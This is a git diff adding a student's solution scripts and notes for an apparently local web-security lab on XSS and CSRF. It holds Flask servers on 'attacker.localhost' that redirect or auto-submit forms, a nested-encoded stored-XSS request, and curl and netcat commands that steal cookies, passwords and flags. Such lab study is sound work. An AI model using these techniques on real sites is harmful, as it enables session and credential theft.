diff --git a/5c/lab5c_3.py b/5c/lab5c_3.py
new file mode 100644
index 0000000..7a65221
--- /dev/null
+++ b/5c/lab5c_3.py
@@ -0,0 +1,9 @@
+from flask import Flask, redirect
+
+app = Flask("pwnc")
+
+@app.route("/")
+def hello():
+ return redirect("http://lab.localhost/showme")
+
+app.run("attacker.localhost", 9999)
diff --git a/5c/lab5c_4.py b/5c/lab5c_4.py
new file mode 100644
index 0000000..5882af2
--- /dev/null
+++ b/5c/lab5c_4.py
@@ -0,0 +1,20 @@
+from flask import Flask, render_template_string
+
+app = Flask("pwnc")
+
+
+@app.route("/")
+def hello():
+ # auto-submit on page load
+ html_form = """
+
+
+
+
+"""
+ return render_template_string(html_form)
+
+
+app.run("attacker.localhost", 9999)
diff --git a/5c/lab5c_6.py b/5c/lab5c_6.py
new file mode 100644
index 0000000..4507ac2
--- /dev/null
+++ b/5c/lab5c_6.py
@@ -0,0 +1,31 @@
+import requests
+
+echo_string = """
+
+"""
+encode_1 = requests.utils.quote(echo_string)
+
+# store the XSS script in server
+middle_url = f"http://lab.localhost/addpost?ptext={encode_1}"
+encode_2 = requests.utils.quote(middle_url)
+
+final_url = f"http://lab.localhost/go?gourl={encode_2}"
+
+requests.get(final_url)
diff --git a/Dojo Notes.md b/Dojo Notes.md
index 2685a9f..9629347 100644
--- a/Dojo Notes.md
+++ b/Dojo Notes.md
@@ -756,3 +756,62 @@ payload = input_str + padding + input_str_hash
- bruteforce to get canary
- buffer overflow, but again too small, so have to go for env var
- also similar stack pivot as we can't directly overwrite saved rip
+
+### lab 5c - xss/csrf
+
+- how to inject JS?
+ - URL-encoded - %xx
+ - event handlers - onload, onmouseover, etc.
+ - image tag with encoding (?)
+- CORS
+- XSS, CSP
+- CSRF, nonce
+
+### lab 5c.1 - alert me
+
+- simple XSS
+- regex validation, poorly done, only checks for `alert()`, can set `let a=alert;a()` or simply use some other dialog box
+- `curl http://lab.localhost/go?gourl='http://lab.localhost/echo?echo='`
+
+### lab 5c.2
+
+- even simpler?
+- leak endpoint provided...
+- `curl http://lab.localhost/go?gourl='http://lab.localhost/leak'`
+
+### lab 5c.3
+
+- CSRF token, given by program
+- but this time the `gourl` URL's hostname is restricted to `attacker.localhost`
+- then let's setup a flask server at this address and use it to redirect to the leak URL
+- `curl http://lab.localhost/go?gourl='http://attacker.localhost:9999/' -H "X-CSRF-Token: $(curl http://lab.localhost/get-csrf-token)"`
+
+### lab 5c.4
+
+- similar, instead of directly returning, it has an endpoint that puts passwords from `users` table into the `posts` table, which is publicly accessible
+- to trigger that, let's make a web server that returns a HTML form that auto-submits on page load, which hits that update endpoint
+- then make the challenge server go to it
+- `curl http://lab.localhost/go?gourl='http://attacker.localhost:9999/' -H "X-CSRF-Token: $(curl http://lab.localhost/get-csrf-token)"`
+- leaked, all that's left to do is view
+- `curl http://lab.localhost/view`
+
+### lab 5c.5
+
+- actly broken, `/profile` forgot to check for cookie
+- but let's see how it works
+
+- cookie but not a HTTP-only cookie
+- `nc -l 9999`
+- `curl http://lab.localhost/go?gourl='http://lab.localhost:9999'`
+- netcat server can see the cookie
+- use it in a request to `/profile`
+
+### lab 5c.6
+
+- stored XSS vuln
+- store the JS in the server
+- fetch that part from the server and the browser executes it
+- JS part:
+ - take flag from secret table and put it in public table
+ - get it and send it to a netcat server `nc lab.localhost -l 9999`
+- boom